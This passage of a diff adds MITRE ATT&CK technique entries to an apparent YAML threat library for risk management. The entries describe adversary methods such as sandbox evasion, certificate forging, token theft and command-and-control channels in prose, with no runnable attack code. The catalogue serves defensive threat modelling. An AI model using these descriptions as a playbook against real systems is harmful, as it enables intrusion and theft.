+      https://attack.mitre.org/techniques/T1609'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1083
+    name: T1083 - File and Directory Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may enumerate files and directories or may search in
+      specific locations of a host or network share for certain information within
+      a file system. Adversaries may use the information from [File and Directory
+      Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery
+      to shape follow-on behaviors, including whether or not the adversary fully infects
+      the target and/or attempts specific actions.
+
+
+      Many command shell utilities can be used to obtain this information. Examples
+      include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>,
+      and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may
+      also be used to gather file and directory information and interact with the
+      [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also
+      leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      on network devices to gather file and directory information (e.g. <code>dir</code>,
+      <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)
+
+      https://attack.mitre.org/techniques/T1083'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1568
+    name: T1568 - Dynamic Resolution
+    provider: MITRE ATT&CK
+    description: 'Adversaries may dynamically establish connections to command and
+      control infrastructure to evade common detections and remediations. This may
+      be achieved by using malware that shares a common algorithm with the infrastructure
+      the adversary uses to receive the malware''s communications. These calculations
+      can be used to dynamically adjust parameters such as the domain name, IP address,
+      or port number the malware uses for command and control.
+
+
+      Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008).
+      When contact is lost with the primary command and control server malware may
+      employ dynamic resolution as a means to reestablishing command and control.(Citation:
+      Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit
+      2017 Activity)
+
+      https://attack.mitre.org/techniques/T1568'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1647
+    name: T1647 - Plist File Modification
+    provider: MITRE ATT&CK
+    description: "Adversaries may modify property list files (plist files) to enable\
+      \ other malicious activity, while also potentially evading and bypassing system\
+      \ defenses. macOS applications use plist files, such as the <code>info.plist</code>\
+      \ file, to store properties and configuration settings that inform the operating\
+      \ system how to handle the application at runtime. Plist files are structured\
+      \ metadata in key-value pairs formatted in XML based on Apple's Core Foundation\
+      \ DTD. Plist files can be saved in text or binary format.(Citation: fileinfo\
+      \ plist file description) \n\nAdversaries can modify key-value pairs in plist\
+      \ files to influence system behaviors, such as hiding the execution of an application\
+      \ (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running\
+      \ additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch\
+      \ Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).\n\
+      \nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist`\
+      \ file, which controls apps that appear in the Dock. Adversaries can also modify\
+      \ the <code>LSUIElement</code> key in an application\u2019s <code>info.plist</code>\
+      \ file  to run the app in the background. Adversaries can also insert key-value\
+      \ pairs to insert environment variables, such as <code>LSEnvironment</code>,\
+      \ to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:\
+      \ wardle chp2 persistence)(Citation: eset_osx_flashback)\nhttps://attack.mitre.org/techniques/T1647"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1074
+    name: T1074 - Data Staged
+    provider: MITRE ATT&CK
+    description: 'Adversaries may stage collected data in a central location or directory
+      prior to Exfiltration. Data may be kept in separate files or combined into one
+      file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560).
+      Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
+      and bash may be used to copy data into a staging location.(Citation: PWC Cloud
+      Hopper April 2017)
+
+
+      In cloud environments, adversaries may stage data within a particular instance
+      or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002)
+      and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
+
+      Adversaries may choose to stage data from a victim network in a centralized
+      location prior to Exfiltration to minimize the number of connections made to
+      their C2 server and better evade detection.
+
+      https://attack.mitre.org/techniques/T1074'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1649
+    name: T1649 - Steal or Forge Authentication Certificates
+    provider: MITRE ATT&CK
+    description: "Adversaries may steal or forge certificates used for authentication\
+      \ to access remote systems or resources. Digital certificates are often used\
+      \ to sign and encrypt messages and/or files. Certificates are also used as authentication\
+      \ material. For example, Azure AD device certificates and Active Directory Certificate\
+      \ Services (AD CS) certificates bind to an identity and can be used as credentials\
+      \ for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft\
+      \ AD CS Overview)\n\nAuthentication certificates can be both stolen and forged.\
+      \ For example, AD CS certificates can be stolen from encrypted storage (in the\
+      \ Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced\
+      \ certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)),\
+      \ or directly from the Windows certificate store via various crypto APIs.(Citation:\
+      \ SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub\
+      \ GhostPack Certificates) With appropriate enrollment rights, users and/or machines\
+      \ within a domain can also request and/or manually renew certificates from enterprise\
+      \ certificate authorities (CA). This enrollment process defines various settings\
+      \ and permissions associated with the certificate. Of note, the certificate\u2019\
+      s extended key usage (EKU) values define signing, encryption, and authentication\
+      \ use cases, while the certificate\u2019s subject alternative name (SAN) values\
+      \ define the certificate owner\u2019s alternate names.(Citation: Medium Certified\
+      \ Pre Owned)\n\nAbusing certificates for authentication credentials may enable\
+      \ other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008).\
+      \ Certificate-related misconfigurations may also enable opportunities for [Privilege\
+      \ Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users\
+      \ to impersonate or assume privileged accounts or permissions via the identities\
+      \ (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003)\
+      \ via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078)\
+      \ for the duration of the certificate's validity, despite user password resets.\
+      \ Authentication certificates can also be stolen and forged for machine accounts.\n\
+      \nAdversaries who have access to root (or subordinate) CA certificate private\
+      \ keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003)\
+      \ by forging arbitrary authentication certificates for the victim domain (known\
+      \ as \u201Cgolden\u201D certificates).(Citation: Medium Certified Pre Owned)\
+      \ Adversaries may also target certificates and related services in order to\
+      \ access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001)\
+      \ ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified\
+      \ Pre Owned)\nhttps://attack.mitre.org/techniques/T1649"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1049
+    name: T1049 - System Network Connections Discovery
+    provider: MITRE ATT&CK
+    description: "Adversaries may attempt to get a listing of network connections\
+      \ to or from the compromised system they are currently accessing or from remote\
+      \ systems by querying for information over the network. \n\nAn adversary who\
+      \ gains access to a system that is part of a cloud-based environment may map\
+      \ out Virtual Private Clouds or Virtual Networks in order to determine what\
+      \ systems and services are connected. The actions performed are likely the same\
+      \ types of discovery techniques depending on the operating system, but the resulting\
+      \ information may include details about the networked cloud environment relevant\
+      \ to the adversary's goals. Cloud providers may have different ways in which\
+      \ their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation:\
+      \ Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly,\
+      \ adversaries who gain access to network devices may also perform similar discovery\
+      \ activities to gather information about connected systems and services.\n\n\
+      Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104),\
+      \ \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039).\
+      \ In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code>\
+      \ can be used to list current connections. <code>who -a</code> and <code>w</code>\
+      \ can be used to show which users are currently logged in, similar to \"net\
+      \ session\". Additionally, built-in features native to network devices and [Network\
+      \ Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g.\
+      \ <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)\n\
+      https://attack.mitre.org/techniques/T1049"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1584
+    name: T1584 - Compromise Infrastructure
+    provider: MITRE ATT&CK
+    description: 'Adversaries may compromise third-party infrastructure that can be
+      used during targeting. Infrastructure solutions include physical or cloud servers,
+      domains, and third-party web and DNS services. Instead of buying, leasing, or
+      renting infrastructure an adversary may compromise infrastructure and use it
+      during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation:
+      ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye
+      EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines
+      to form a botnet they can leverage.
+
+
+      Use of compromised infrastructure allows adversaries to stage, launch, and execute
+      operations. Compromised infrastructure can help adversary operations blend in
+      with traffic that is seen as normal, such as contact with high reputation or
+      trusted sites. For example, adversaries may leverage compromised infrastructure
+      (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004))
+      to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566)
+      campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may
+      also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090)
+      and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)
+
+
+      By using compromised infrastructure, adversaries may make it difficult to tie
+      their actions back to them. Prior to targeting, adversaries may compromise the
+      infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
+
+      https://attack.mitre.org/techniques/T1584'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1542
+    name: T1542 - Pre-OS Boot
+    provider: MITRE ATT&CK
+    description: 'Adversaries may abuse Pre-OS Boot mechanisms as a way to establish
+      persistence on a system. During the booting process of a computer, firmware
+      and various startup services are loaded before the operating system. These programs
+      control flow of execution before the operating system takes control.(Citation:
+      Wikipedia Booting)
+
+
+      Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic
+      Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to
+      persist on systems at a layer below the operating system. This can be particularly
+      difficult to detect as malware at this level will not be detected by host software-based
+      defenses.
+
+      https://attack.mitre.org/techniques/T1542'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1612
+    name: T1612 - Build Image on Host
+    provider: MITRE ATT&CK
+    description: "Adversaries may build a container image directly on a host to bypass\
+      \ defenses that monitor for the retrieval of malicious images from a public\
+      \ registry. A remote <code>build</code> request may be sent to the Docker API\
+      \ that includes a Dockerfile that pulls a vanilla base image, such as alpine,\
+      \ from a public or local registry and then builds a custom image upon it.(Citation:\
+      \ Docker Build Image)\n\nAn adversary may take advantage of that <code>build</code>\
+      \ API to build a custom image on the host that includes malware downloaded from\
+      \ their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610)\
+      \ using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua\
+      \ Security Cloud Native Threat Report June 2021) If the base image is pulled\
+      \ from a public registry, defenses will likely not detect the image as malicious\
+      \ since it\u2019s a vanilla image. If the base image already resides in a local\
+      \ registry, the pull may be considered even less suspicious since the image\
+      \ is already in the environment.\nhttps://attack.mitre.org/techniques/T1612"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1586
+    name: T1586 - Compromise Accounts
+    provider: MITRE ATT&CK
+    description: "Adversaries may compromise accounts with services that can be used\
+      \ during targeting. For operations incorporating social engineering, the utilization\
+      \ of an online persona may be important. Rather than creating and cultivating\
+      \ accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)),\
+      \ adversaries may compromise existing accounts. Utilizing an existing persona\
+      \ may engender a level of trust in a potential victim if they have a relationship,\
+      \ or knowledge of, the compromised persona. \n\nA variety of methods exist for\
+      \ compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598),\
+      \ purchasing credentials from third-party sites, brute forcing credentials (ex:\
+      \ password reuse from breach credential dumps), or paying employees, suppliers\
+      \ or business partners for access to credentials.(Citation: AnonHBGary)(Citation:\
+      \ Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct\
+      \ Reconnaissance to inform decisions about which accounts to compromise to further\
+      \ their operation.\n\nPersonas may exist on a single site or across multiple\
+      \ sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts\
+      \ may require additional development, this could include filling out or modifying\
+      \ profile information, further developing social networks, or incorporating\
+      \ photos.\n\nAdversaries may directly leverage compromised email accounts for\
+      \ [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).\n\
+      https://attack.mitre.org/techniques/T1586"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1497
+    name: T1497 - Virtualization/Sandbox Evasion
+    provider: MITRE ATT&CK
+    description: 'Adversaries may employ various means to detect and avoid virtualization
+      and analysis environments. This may include changing behaviors based on the
+      results of checks for the presence of artifacts indicative of a virtual machine
+      environment (VME) or sandbox. If the adversary detects a VME, they may alter
+      their malware to disengage from the victim or conceal the core functions of
+      the implant. They may also search for VME artifacts before dropping secondary
+      or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox
+      Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery
+      to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
+
+
+      Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
+      such as checking for security monitoring tools (e.g., Sysinternals, Wireshark,
+      etc.) or other system artifacts associated with analysis or virtualization.
+      Adversaries may also check for legitimate user activity to help determine if
+      it is in an analysis environment. Additional methods include use of sleep timers
+      or loops within malware code to avoid operating within a temporary sandbox.(Citation:
+      Unit 42 Pirpi July 2015)
+
+      https://attack.mitre.org/techniques/T1497'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1102
+    name: T1102 - Web Service
+    provider: MITRE ATT&CK
+    description: 'Adversaries may use an existing, legitimate external Web service
+      as a means for relaying data to/from a compromised system. Popular websites
+      and social media acting as a mechanism for C2 may give a significant amount
+      of cover due to the likelihood that hosts within a network are already communicating
+      with them prior to a compromise. Using common services, such as those offered
+      by Google or Twitter, makes it easier for adversaries to hide in expected noise.
+      Web service providers commonly use SSL/TLS encryption, giving adversaries an
+      added level of protection.
+
+
+      Use of Web services may also protect back-end C2 infrastructure from discovery
+      through malware binary analysis while also enabling operational resiliency (since
+      this infrastructure may be dynamically changed).
+
+      https://attack.mitre.org/techniques/T1102'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1608
+    name: T1608 - Stage Capabilities
+    provider: MITRE ATT&CK
+    description: 'Adversaries may upload, install, or otherwise set up capabilities
+      that can be used during targeting. To support their operations, an adversary
+      may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587))
+      or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588))
+      and stage them on infrastructure under their control. These capabilities may
+      be staged on infrastructure that was previously purchased/rented by the adversary
+      ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was
+      otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
+      Capabilities may also be staged on web services, such as GitHub or Pastebin,
+      or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision
+      applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos
+      Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope
+      GCP Redirection)(Citation: Netskope Cloud Phishing)
+
+
+      Staging of capabilities can aid the adversary in a number of initial access
+      and post-compromise behaviors, including (but not limited to):
+
+
+      * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)
+      when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation:
+      Gallagher 2015)(Citation: ATT ScanBox)
+
+      * Staging web resources for a link target to be used with spearphishing.(Citation:
+      Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September
+      2019)
+
+      * Uploading malware or tools to a location accessible to a victim network to
+      enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation:
+      Volexity Ocean Lotus November 2020)
+
+      * Installing a previously acquired SSL/TLS certificate to use to encrypt command
+      and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002)
+      with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation:
+      DigiCert Install SSL Cert)
+
+      https://attack.mitre.org/techniques/T1608'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1104
+    name: T1104 - Multi-Stage Channels
+    provider: MITRE ATT&CK
+    description: 'Adversaries may create multiple stages for command and control that
+      are employed under different conditions or for certain functions. Use of multiple
+      stages may obfuscate the command and control channel to make detection more
+      difficult.
+
+
+      Remote access tools will call back to the first-stage command and control server
+      for instructions. The first stage may have automated capabilities to collect
+      basic host information, update tools, and upload additional files. A second
+      remote access tool (RAT) could be uploaded at that point to redirect the host
+      to the second-stage command and control server. The second stage will likely
+      be more fully featured and allow the adversary to interact with the system through
+      a reverse shell and additional RAT features.
+
+
+      The different stages will likely be hosted separately with no overlapping infrastructure.
+      The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008)
+      in case the original first-stage communication path is discovered and blocked.
+
+      https://attack.mitre.org/techniques/T1104'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1657
+    name: T1657 - Financial Theft
+    provider: MITRE ATT&CK
+    description: "Adversaries may steal monetary resources from targets through extortion,\
+      \ social engineering, technical theft, or other methods aimed at their own financial\
+      \ gain at the expense of the availability of these resources for victims. Financial\
+      \ theft is the ultimate objective of several popular campaign types including\
+      \ extortion by ransomware,(Citation: FBI-ransomware) business email compromise\
+      \ (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig\
+      \ butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency\
+      \ networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586)\
+      \ to conduct unauthorized transfers of funds.(Citation: Internet crime report\
+      \ 2022) In the case of business email compromise or email fraud, an adversary\
+      \ may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of\
+      \ a trusted entity. Once the social engineering is successful, victims can be\
+      \ deceived into sending money to financial accounts controlled by an adversary.(Citation:\
+      \ FBI-BEC) This creates the potential for multiple victims (i.e., compromised\
+      \ accounts as well as the ultimate monetary loss) in incidents involving financial\
+      \ theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when\
+      \ an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)\
+      \ (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010)\
+      \ of data, followed by threatening public exposure unless payment is made to\
+      \ the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense\
+      \ business impact of financial theft, an adversary may abuse the possibility\
+      \ of financial theft and seeking monetary gain to divert attention from their\
+      \ true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485)\
+      \ and business disruption.(Citation: AP-NotPetya)\nhttps://attack.mitre.org/techniques/T1657"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1480
+    name: T1480 - Execution Guardrails
+    provider: MITRE ATT&CK
+    description: "Adversaries may use execution guardrails to constrain execution\
+      \ or actions based on adversary supplied and environment specific conditions\
+      \ that are expected to be present on the target. Guardrails ensure that a payload\
+      \ only executes against an intended target and reduces collateral damage from\
+      \ an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values\
+      \ an adversary can provide about a target system or environment to use as guardrails\
+      \ may include specific network share names, attached physical devices, files,\
+      \ joined Active Directory (AD) domains, and local/external IP addresses.(Citation:\
+      \ FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of\
+      \ capabilities in environments that are not intended to be compromised or operated\
+      \ within. This use of guardrails is distinct from typical [Virtualization/Sandbox\
+      \ Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox\
+      \ Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for\
+      \ known sandbox values and continuing with execution only if there is no match,\
+      \ the use of guardrails will involve checking for an expected target-specific\
+      \ value and only continuing with execution if there is such a match.\nhttps://attack.mitre.org/techniques/T1480"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1619
+    name: T1619 - Cloud Storage Object Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may enumerate objects in cloud storage infrastructure.
+      Adversaries may use this information during automated discovery to shape follow-on
+      behaviors, including requesting all or specific objects from cloud storage.  Similar
+      to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
+      on a local host, after identifying available storage services (i.e. [Cloud Infrastructure
+      Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access
+      the contents/objects stored in cloud infrastructure.
+
+
+      Cloud service providers offer APIs allowing users to enumerate objects stored
+      within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2)
+      and List Blobs in Azure(Citation: List Blobs) .
+
+      https://attack.mitre.org/techniques/T1619'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1654
+    name: T1654 - Log Enumeration
+    provider: MITRE ATT&CK
+    description: "Adversaries may enumerate system and service logs to find useful\
+      \ data. These logs may highlight various types of valuable insights for an adversary,\
+      \ such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)),\
+      \ security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)),\
+      \ or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).\n\
+      \nHost binaries may be leveraged to collect system logs. Examples include using\
+      \ `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001)\
+      \ on Windows to access and/or export security event information.(Citation: WithSecure\
+      \ Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges\
+      \ as novel threat actor) In cloud environments, adversaries may leverage utilities\
+      \ such as the Azure VM Agent\u2019s `CollectGuestLogs.exe` to collect security\
+      \ logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of\
+      \ the Microsoft Azure Serial Console)\n\nAdversaries may also target centralized\
+      \ logging infrastructure such as SIEMs. Logs may also be bulk exported and sent\
+      \ to adversary-controlled infrastructure for offline analysis.\nhttps://attack.mitre.org/techniques/T1654"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1528
+    name: T1528 - Steal Application Access Token
+    provider: MITRE ATT&CK
+    description: "Adversaries can steal application access tokens as a means of acquiring\
+      \ credentials to access remote systems and resources.\n\nApplication access\
+      \ tokens are used to make authorized API requests on behalf of a user or service\
+      \ and are commonly used as a way to access resources in cloud and container-based\
+      \ applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should\
+      \ Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented\
+      \ framework that issues tokens to users for access to systems. Adversaries who\
+      \ steal account API tokens in cloud and containerized environments may be able\
+      \ to access data and perform actions with the permissions of these accounts,\
+      \ which can lead to privilege escalation and further compromise of the environment.\n\
+      \nIn Kubernetes environments, processes running inside a container communicate\
+      \ with the Kubernetes API server using service account tokens. If a container\
+      \ is compromised, an attacker may be able to steal the container\u2019s token\
+      \ and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service\
+      \ Accounts)\n\nToken theft can also occur through social engineering, in which\
+      \ case user action may be required to grant access. An application desiring\
+      \ access to cloud-based services or protected APIs can gain entry using OAuth\
+      \ 2.0 through a variety of authorization protocols. An example commonly-used\
+      \ sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft\
+      \ Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization\
+      \ flow - June 2019) An OAuth access token enables a third-party application\
+      \ to interact with resources containing user data in the ways requested by the\
+      \ application without obtaining user credentials. \n \nAdversaries can leverage\
+      \ OAuth authorization by constructing a malicious application designed to be\
+      \ granted access to resources with the target user's OAuth token.(Citation:\
+      \ Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm\
+      \ OAuth 2017) The adversary will need to complete registration of their application\
+      \ with the authorization server, for example Microsoft Identity Platform using\
+      \ Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell,\
+      \ or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019)\
+      \ Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)\
+      \ to the target user to entice them to grant access to the application. Once\
+      \ the OAuth access token is granted, the application can gain potentially long-term\
+      \ access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation:\
+      \ Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens\
+      \ may function within a limited lifetime, limiting how long an adversary can\
+      \ utilize the stolen token. However, in some cases, adversaries can also steal\
+      \ application refresh tokens(Citation: Auth0 Understanding Refresh Tokens),\
+      \ allowing them to obtain new access tokens without prompting the user.\nhttps://attack.mitre.org/techniques/T1528"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1204
+    name: T1204 - User Execution
+    provider: MITRE ATT&CK
+    description: 'An adversary may rely upon specific actions by a user in order to
+      gain execution. Users may be subjected to social engineering to get them to
+      execute malicious code by, for example, opening a malicious document file or
+      link. These user actions will typically be observed as follow-on behavior from
+      forms of [Phishing](https://attack.mitre.org/techniques/T1566).
+
+
+      While [User Execution](https://attack.mitre.org/techniques/T1204) frequently
+      occurs shortly after Initial Access it may occur at other phases of an intrusion,
+      such as when an adversary places a file in a shared directory or on a user''s
+      desktop hoping that a user will click on it. This activity may also be seen
+      shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
+
+
+      Adversaries may also deceive users into performing actions such as enabling
+      [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing
+      direct control of the system to the adversary, or downloading and executing
+      malware for [User Execution](https://attack.mitre.org/techniques/T1204). For
+      example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566),
+      vishing, or various forms of user interaction. Adversaries can use a combination
+      of these methods, such as spoofing and promoting toll-free numbers or call centers
+      that are used to direct victims to malicious websites, to deliver and execute
+      payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation:
+      Telephone Attack Delivery)
+
+      https://attack.mitre.org/techniques/T1204'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1057
+    name: T1057 - Process Discovery
+    provider: MITRE ATT&CK
+    description: 'Adversaries may attempt to get information about running processes
+      on a system. Information obtained could be used to gain an understanding of
+      common software/applications running on systems within the network. Adversaries
+      may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057)
+      during automated discovery to shape follow-on behaviors, including whether or
+      not the adversary fully infects the target and/or attempts specific actions.
+
+
+      In Windows environments, adversaries could obtain details on running processes
+      using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106)
+      or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      Information about processes can also be extracted from the output of [Native
+      API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>.
+      In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries
+      may also opt to enumerate processes via /proc.
+
+
+      On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
+      commands such as `show processes` can be used to display current running processes.(Citation:
+      US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
+
+      https://attack.mitre.org/techniques/T1057'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1072
+    name: T1072 - Software Deployment Tools
+    provider: MITRE ATT&CK
+    description: "Adversaries may gain access to and use third-party software suites\
+      \ installed within an enterprise network, such as administration, monitoring,\
+      \ and deployment systems, to move laterally through the network. Third-party\
+      \ applications and software deployment systems may be in use in the network\
+      \ environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).\
+      \  \n\nAccess to a third-party network-wide or enterprise-wide software system\
+      \ may enable an adversary to have remote code execution on all systems that\
+      \ are connected to such a system. The access may be used to laterally move to\
+      \ other systems, gather information, or cause a specific effect, such as wiping\
+      \ the hard drives on all endpoints. Network infrastructure may also have administration\
+      \ tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day\
+      \ and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)\n\
+      \nThe permissions required for this action vary by system configuration; local\
+      \ credentials may be sufficient with direct access to the third-party system,\
+      \ or specific domain credentials may be required. However, the system may require\
+      \ an administrative account to log in or to perform it's intended purpose.\n\
+      https://attack.mitre.org/techniques/T1072"
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1041
+    name: T1041 - Exfiltration Over C2 Channel
+    provider: MITRE ATT&CK
+    description: 'Adversaries may steal data by exfiltrating it over an existing command
+      and control channel. Stolen data is encoded into the normal communications channel
+      using the same protocol as command and control communications.
+
+      https://attack.mitre.org/techniques/T1041'
+    version: '1.0'
+  - urn: urn:intuitem:risk:threat:mitre-attack:T1591
